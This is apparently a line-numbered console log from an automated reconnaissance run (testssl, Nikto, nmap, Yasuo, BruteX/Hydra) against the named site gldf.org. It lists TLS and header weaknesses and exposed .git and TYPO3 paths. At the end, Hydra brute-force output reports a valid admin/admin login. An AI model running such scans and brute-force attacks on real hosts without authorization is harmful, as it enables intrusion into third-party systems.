1780. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1781. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1782. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1783. Accepted TLSv1.2 128 bits AES128-SHA256
1784. Accepted TLSv1.2 128 bits AES128-SHA
1785. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
1786. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1787. Accepted TLSv1.1 256 bits AES256-SHA
1788. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
1789. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1790. Accepted TLSv1.1 128 bits AES128-SHA
1791. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
1792. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1793. Accepted TLSv1.0 256 bits AES256-SHA
1794. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
1795. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1796. Accepted TLSv1.0 128 bits AES128-SHA
1797. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
1798.  
1799. SSL Certificate:
1800. Signature Algorithm: sha256WithRSAEncryption
1801. RSA Key Strength: 2048
1802.  
1803. Subject: www.gldf.org
1804. Altnames: DNS:www.gldf.org, DNS:gldf.org
1805. Issuer: RapidSSL SHA256 CA
1806.  
1807. Not valid before: Apr 14 00:00:00 2016 GMT
1808. Not valid after: Apr 14 23:59:59 2018 GMT
1809. 
1810. ###########################################################
1811. testssl 2.9dev from https://testssl.sh/dev/
1812. 
1813. This program is free software. Distribution and
1814. modification under GPLv2 permitted.
1815. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
1816.  
1817. Please file bugs @ https://testssl.sh/bugs/
1818. 
1819. ###########################################################
1820.  
1821. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
1822. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
1823. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
1824.  
1825.  
1826.  Start 2018-01-05 17:16:39 -->> 51.254.204.201:443 (gldf.org) <<--
1827.  
1828. rDNS (51.254.204.201): 201.ip-51-254-204.eu.
1829. Service detected: HTTP
1830.  
1831.  
1832.  Testing protocols via sockets except SPDY+HTTP2 
1833.  
1834.  SSLv2 not offered (OK)
1835.  SSLv3 not offered (OK)
1836.  TLS 1 offered
1837.  TLS 1.1 offered
1838.  TLS 1.2 offered (OK)
1839.  TLS 1.3 not offered
1840.  SPDY/NPN not offered
1841.  HTTP2/ALPN not offered
1842.  
1843.  Testing ~standard cipher categories 
1844.  
1845.  NULL ciphers (no encryption) not offered (OK)
1846.  Anonymous NULL Ciphers (no authentication) not offered (OK)
1847.  Export ciphers (w/o ADH+NULL) not offered (OK)
1848.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
1849.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
1850.  Triple DES Ciphers (Medium) not offered (OK)
1851.  High encryption (AES+Camellia, no AEAD) offered (OK)
1852.  Strong encryption (AEAD ciphers) offered (OK)
1853.  
1854.  
1855.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
1856.  
1857.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
1858. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
1859. ECDHE-RSA-AES128-GCM-SHA256
1860. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
1861.  Elliptic curves offered: prime256v1
1862.  
1863.  
1864.  Testing server preferences 
1865.  
1866.  Has server cipher order? yes (OK)
1867.  Negotiated protocol TLSv1.2
1868.  Negotiated cipher ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1869.  Cipher order
1870. TLSv1: ECDHE-RSA-AES256-SHA AES256-SHA CAMELLIA256-SHA
1871. ECDHE-RSA-AES128-SHA AES128-SHA CAMELLIA128-SHA
1872. TLSv1.1: ECDHE-RSA-AES256-SHA AES256-SHA CAMELLIA256-SHA
1873. ECDHE-RSA-AES128-SHA AES128-SHA CAMELLIA128-SHA
1874. TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA384
1875. ECDHE-RSA-AES256-SHA AES256-GCM-SHA384 AES256-SHA256 AES256-SHA
1876. CAMELLIA256-SHA ECDHE-RSA-AES128-GCM-SHA256
1877. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA AES128-GCM-SHA256
1878. AES128-SHA256 AES128-SHA CAMELLIA128-SHA
1879.  
1880.  
1881.  Testing server defaults (Server Hello) 
1882.  
1883.  TLS extensions (standard) "server name/#0" "renegotiation info/#65281"
1884. "EC point formats/#11" "session ticket/#35"
1885. "heartbeat/#15"
1886.  Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
1887.  SSL Session ID support yes
1888.  Session Resumption Tickets: yes, ID: yes
1889.  TLS clock skew Random values, no fingerprinting possible
1890.  Signature Algorithm SHA256 with RSA
1891.  Server key size RSA 2048 bits
1892.  Fingerprint / Serial SHA1 E3CBE73CE7E282BF59F838CF1A942CC4ECB8FB09 / 74E36BEF6E2CAC3E5116A2512119FF3F
1893. SHA256 C4F25B267B619B7554491AF696981850D866E87FE59C21BD26496797B57B7AD8
1894.  Common Name (CN) www.gldf.org
1895.  subjectAltName (SAN) www.gldf.org gldf.org 
1896.  Issuer RapidSSL SHA256 CA (GeoTrust Inc. from US)
1897.  Trust (hostname) Ok via SAN (same w/o SNI)
1898.  Chain of trust NOT ok (chain incomplete)
1899.  EV cert (experimental) no
1900.  Certificate Expiration 99 >= 60 days (2016-04-13 20:00 --> 2018-04-14 19:59 -0400)
1901.  # of certificates provided 1
1902.  Certificate Revocation List http://gp.symcb.com/gp.crl
1903.  OCSP URI http://gp.symcd.com
1904.  OCSP stapling not offered
1905.  OCSP must staple no
1906.  DNS CAA RR (experimental) not offered
1907.  Certificate Transparency yes (certificate extension)
1908.  
1909.  
1910.  Testing HTTP header response @ "/" 
1911.  
1912.  HTTP Status Code  301 Moved Permanently, redirecting to "https://www.gldf.org/"
1913.  HTTP clock skew 0 sec from localtime
1914.  Strict Transport Security --
1915.  Public Key Pinning --
1916.  Server banner Apache/2(B.2(B.2(B2(B (Debian(B)
1917.  Application banner --
1918.  Cookie(s) (none issued at "/") -- maybe better try target URL of 30x
1919.  Security headers --
1920.  Reverse Proxy banner --
1921.  
1922.  
1923.  Testing vulnerabilities 
1924.  
1925.  Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
1926.  CCS (CVE-2014-0224) not vulnerable (OK)
1927.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
1928.  ROBOT not vulnerable (OK)
1929.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
1930.  Secure Client-Initiated Renegotiation not vulnerable (OK)
1931.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
1932.  BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
1933. Can be ignored for static pages or if no secrets in the page
1934.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
1935.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
1936.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
1937.  FREAK (CVE-2015-0204) not vulnerable (OK)
1938.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
1939. make sure you don't use this certificate elsewhere with SSLv2 enabled services
1940. https://censys.io/ipv4?q=C4F25B267B619B7554491AF696981850D866E87FE59C21BD26496797B57B7AD8 could help you to find out
1941.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
1942.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES256-SHA
1943. AES256-SHA CAMELLIA256-SHA
1944. ECDHE-RSA-AES128-SHA
1945. AES128-SHA CAMELLIA128-SHA 
1946. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
1947.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
1948.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
1949.  
1950.  
1951.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
1952.  
1953. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
1954. -----------------------------------------------------------------------------------------------------------------------------
1955. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
1956. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
1957. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
1958. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
1959. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
1960. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
1961. x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
1962. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
1963. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
1964. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
1965. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
1966. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
1967. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
1968. x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
1969.  
1970.  
1971.  Running client simulations via sockets 
1972.  
1973. Android 2.3.7 TLSv1.0 AES128-SHA
1974. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1975. Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1976. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1977. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1978. Android 6.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1979. Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1980. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1981. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1982. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1983. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1984. IE 6 XP No connection
1985. IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1986. IE 8 XP No connection
1987. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1988. IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
1989. IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
1990. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
1991. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1992. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1993. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1994. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1995. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
1996. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
1997. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1998. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1999. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2000. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2001. Java 6u45 TLSv1.0 AES128-SHA
2002. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
2003. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
2004. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2005. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2006.  
2007. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
2008. + -- --=[Checking for DROWN (SSLv2): 51.254.204.201:443
2009. + -- --=[Checking for HeartBleed: 51.254.204.201:443
2010. + -- --=[Checking for OpenSSL CCS: 51.254.204.201:443
2011. + -- --=[Checking for Poodle (SSLv3): 51.254.204.201:443
2012. + -- --=[Checking for WinShock (MS14-066): 51.254.204.201:443
2013. Testing if OpenSSL supports the ciphers we are checking for: YES
2014.  
2015. Testing 51.254.204.201:443 for availability of SSL ciphers added in MS14-066...
2016. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
2017. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
2018. Testing cipher AES256-GCM-SHA384: SUPPORTED
2019. Testing cipher AES128-GCM-SHA256: SUPPORTED
2020. Testing if IIS is running on port 443: NO
2021. Checking if target system is running Windows Server 2012 or later...
2022. Testing cipher ECDHE-RSA-AES256-SHA384: SUPPORTED
2023. 51.254.204.201:443 is patched: UNKNOWN: Windows Server 2012 or later detected.
2024. + -- --=[Scan Complete!
2025.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
2026. + -- --=[Checking if X-Content options are enabled on gldf.org... 
2027.  
2028. + -- --=[Checking if X-Frame options are enabled on gldf.org... 
2029.  
2030. + -- --=[Checking if X-XSS-Protection header is enabled on gldf.org... 
2031.  
2032. + -- --=[Checking HTTP methods on gldf.org... 
2033.  
2034. + -- --=[Checking if TRACE method is enabled on gldf.org... 
2035.  
2036. + -- --=[Checking for META tags on gldf.org... 
2037.  
2038. + -- --=[Checking for open proxy on gldf.org... 
2039.  
2040. + -- --=[Enumerating software on gldf.org... 
2041. Server: Apache/2.2.22 (Debian)
2042.  
2043. + -- --=[Checking if Strict-Transport-Security is enabled on gldf.org... 
2044.  
2045. + -- --=[Checking for Flash cross-domain policy on gldf.org... 
2046. <html><head>
2047. <title>400 Bad Request</title>
2048. </head><body>
2049. <h1>Bad Request</h1>
2050. <p>Your browser sent a request that this server could not understand.<br />
2051. </p>
2052. <hr>
2053. <address>Apache/2.2.22 (Debian) Server at www.gldf.org Port 443</address>
2054. </body></html>
2055.  
2056.  
2057. + -- --=[Checking for Silverlight cross-domain policy on gldf.org... 
2058. <html><head>
2059. <title>400 Bad Request</title>
2060. </head><body>
2061. <h1>Bad Request</h1>
2062. <p>Your browser sent a request that this server could not understand.<br />
2063. </p>
2064. <hr>
2065. <address>Apache/2.2.22 (Debian) Server at www.gldf.org Port 443</address>
2066. </body></html>
2067.  
2068.  
2069. + -- --=[Checking for HTML5 cross-origin resource sharing on gldf.org... 
2070.  
2071. + -- --=[Retrieving robots.txt on gldf.org... 
2072.  
2073. User-agent: *
2074. Allow: / # Allow bot to enter
2075.  
2076. Disallow: /fileadmin/ # Nothing to see here
2077. Disallow: /t3lib/ # Nothing to see here
2078. Disallow: /typo3/ # Nothing to see here
2079. Disallow: /*&type=98 # Disable print pages
2080.  
2081. Sitemap: https://www.gldf.org/sitemap.xml # Your Sitemap
2082.  
2083. + -- --=[Retrieving sitemap.xml on gldf.org... 
2084.  
2085. + -- --=[Checking cookie attributes on gldf.org... 
2086.  
2087. + -- --=[Checking for ASP.NET Detailed Errors on gldf.org... 
2088.  
2089. 
2090.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
2091. - Nikto v2.1.6
2092. ---------------------------------------------------------------------------
2093. + Target IP: 51.254.204.201
2094. + Target Hostname: gldf.org
2095. + Target Port: 443
2096. ---------------------------------------------------------------------------
2097. + SSL Info: Subject: /CN=www.gldf.org
2098. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
2099. Issuer: /C=US/O=GeoTrust Inc./CN=RapidSSL SHA256 CA
2100. + Start Time: 2018-01-05 17:20:54 (GMT-5)
2101. ---------------------------------------------------------------------------
2102. + Server: Apache/2.2.22 (Debian)
2103. + The anti-clickjacking X-Frame-Options header is not present.
2104. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
2105. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
2106. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
2107. + Root page / redirects to: https://www.gldf.org/
2108. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 84820, size: 428, mtime: Wed Dec 7 12:05:00 2016
2109. + Entry '/ /' in robots.txt returned a non-forbidden or redirect HTTP code (301)
2110. + Cookie be_typo_user created without the secure flag
2111. + Cookie PHPSESSID created without the secure flag
2112. + Cookie PHPSESSID created without the httponly flag
2113. + Entry '/typo3/ /' in robots.txt returned a non-forbidden or redirect HTTP code (200)
2114. + "robots.txt" contains 5 entries which should be manually viewed.
2115. + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
2116. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
2117. + Hostname 'gldf.org' does not match certificate's names: www.gldf.org
2118. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
2119. + OSVDB-3233: /icons/README: Apache default file found.
2120. + /typo3/: TYPO3 login found
2121. + OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
2122. + /.git/HEAD: Git HEAD file found. Full repo details may be present.
2123. + /.git/config: Git config file found. Infos about repo details may be present.
2124. + OSVDB-3093: /typo3_src/ChangeLog: TYPO3 ChangeLog file found.
2125. + 8318 requests: 0 error(s) and 21 item(s) reported on remote host
2126. + End Time: 2018-01-05 18:35:07 (GMT-5) (4453 seconds)
2127. ---------------------------------------------------------------------------
2128. + 1 host(s) tested
2129.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
2130. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/gldf.org-port443.jpg
2131.  
2132. #########################################################################################
2133. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
2134. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
2135. `888. .8' .88888. Y88bo. 888 8 888 888
2136. `888.8' .8' `888. `ZY8888o. 888 8 888 888
2137. `888' .88ooo8888. `0Y88b 888 8 888 888
2138. 888 .8' `888. oo .d8P `88. .8' `88b d88'
2139. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
2140. Welcome to Yasuo v2.3
2141. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
2142. #########################################################################################
2143.  
2144. I, [2018-01-05T18:36:37.315840 #20171] INFO -- : Initiating port scan
2145. I, [2018-01-05T18:37:00.243182 #20171] INFO -- : Using nmap scan output file logs/nmap_output_2018-01-05_18-36-37.xml
2146. I, [2018-01-05T18:37:00.244504 #20171] INFO -- : Discovered open port: 51.254.204.201:80
2147. I, [2018-01-05T18:37:01.373989 #20171] INFO -- : Discovered open port: 51.254.204.201:443
2148. I, [2018-01-05T18:37:02.913686 #20171] INFO -- : <<<Enumerating vulnerable applications>>>
2149.  
2150.  
2151. --------------------------------------------------------
2152. <<<Yasuo discovered following vulnerable applications>>>
2153. --------------------------------------------------------
2154. +----------+--------------------+-------------------+----------+----------+
2155. | App Name | URL to Application | Potential Exploit | Username | Password |
2156. +----------+--------------------+-------------------+----------+----------+
2157. +----------+--------------------+-------------------+----------+----------+
2158.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
2159.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
2160.  __________ __ ____ ___
2161.  \______ \_______ __ ___/ |_ ____ \ \/ /
2162.  | | _/\_ __ \ | \ __\/ __ \ \ / 
2163.  | | \ | | \/ | /| | \ ___/ / \ 
2164.  |______ / |__| |____/ |__| \___ >___/\ \ 
2165.  \/ \/ \_/
2166.  
2167.  + -- --=[BruteX v1.7 by 1N3
2168.  + -- --=[http://crowdshield.com
2169.  
2170.  
2171. ################################### Running Port Scan ##############################
2172.  
2173. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 18:39 EST
2174. Nmap scan report for gldf.org (51.254.204.201)
2175. Host is up (0.11s latency).
2176. rDNS record for 51.254.204.201: 201.ip-51-254-204.eu
2177. Not shown: 24 filtered ports
2178. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2179. PORT STATE SERVICE
2180. 80/tcp open http
2181. 443/tcp open https
2182.  
2183. Nmap done: 1 IP address (1 host up) scanned in 2.90 seconds
2184.  
2185. ################################### Running Brute Force ############################
2186.  
2187.  
2188.  + -- --=[Port 80 opened... running tests...
2189. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2190.  
2191. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-05 18:39:55
2192. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
2193. [DATA] attacking http-get://gldf.org:80//
2194. [80][http-get] host: gldf.org login: admin password: admin
2195. [STATUS] attack finished for gldf.org (valid pair found)
2196. 1 of 1 target successfully completed, 1 valid password found
2197. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-05 18:40:05
2198.  
2199.  + -- --=[Port 443 opened... running tests...
2200. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2201.  
2202. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-05 18:40:05
2203. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
2204. [DATA] attacking http-gets://gldf.org:443//
2205. [443][http-get] host: gldf.org login: admin password: admin
2206. [STATUS] attack finished for gldf.org (valid pair found)
2207. 1 of 1 target successfully completed, 1 valid password found
2208. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-05 18:40:06
2209.  
2210. #######################################################################################################################################